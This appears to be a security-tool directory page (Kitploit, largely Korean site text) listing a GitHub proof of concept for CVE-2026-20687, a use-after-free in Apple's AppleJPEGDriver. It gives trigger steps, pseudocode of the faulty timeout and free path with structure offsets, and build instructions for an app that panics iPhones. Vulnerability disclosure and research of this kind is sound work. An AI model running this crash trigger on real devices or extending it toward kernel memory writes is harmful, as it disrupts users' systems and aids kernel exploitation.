Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-20687-AppleJPEGDriver-UAF — CVE-2026-20687: AppleJPEGDriver startDecoder Timeout UAF — iOS/macOS kernel vulnerability leading to deferred panic (A19 Pro, iOS 26.3 RC) | Kitploit
도구/GitHubGitHub/0xjohnnydev/cve-2026-20687-applejpegdriver-uaf
iOS SecurityVulnerability AnalysisExploitationMobile SecurityBinary Exploitation
GitHub0xjohnnydev/cve-2026-20687-applejpegdriver-uaf

CVE-2026-20687-AppleJPEGDriver-UAF

CVE-2026-20687: AppleJPEGDriver startDecoder Timeout UAF — iOS/macOS kernel vulnerability leading to deferred panic (A19 Pro, iOS 26.3 RC)

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트
2141319일 전Kitploit 검토 완료
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

CVE-2026-20687: AppleJPEGDriver startDecoder() Timeout UAF (deferred panic)

CVE-2026-20687 | Author: Johnny Franks (@0xjohnny)

Component: Kernel

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A use after free issue was addressed with improved memory management.

— Apple Security Content, iOS 26.4 and iPadOS 26.4

This will kernel panic your device. Save your work.

Tested on iOS 26.3 (23D125) on iPhone18,2 (iPhone 17 Pro Max, A19 Pro).

Trigger

Direct trigger:

  1. Run the PoC and tap Panic (primes the driver / queues async work).
  2. Then open Camera (this reliably causes a sync JPEG decode + timeout on the affected build).
  3. The timeout path frees a request but leaves its embedded queue node pointer in the per-codec vector.
  4. A later queue walk dereferences the stale node and the kernel panics (MTE tag check fault).
root@kitploit:~
// PoC: primes the driver; panic is usually deferred until Camera is opened.
IOServiceOpen("AppleJPEGDriver");
for (int i = 0; i < N; i++) {
  startDecoder_async();                   // queue_io_gated(): vector.push(req + 0x78)
}
IOServiceClose(conn);

// Later, opening Camera triggers:
startDecoder_sync();
  queue_io_gated(): vector.push(req + 0x78);
  wait(10s) -> TIMEOUT;
  pool_free(req);                         // BUG: does NOT dequeue (req + 0x78)

// Later still (finish_io_gated):
fullSpeedRequestExist():
  node_ptr = vector[i];                   // stale: node_ptr == (freed req + 0x78)
  req2 = *(node_ptr + 0x8);              // UAF read of req+0x80 -> MTE tag fault -> panic

Build & Run

  1. Open ios-app/Test.xcodeproj in Xcode
  2. Select your iOS device (simulator is not useful)
  3. Build and run
  4. Tap the Panic button
  5. Open the Camera app to trigger the deferred panic
도구 다운로드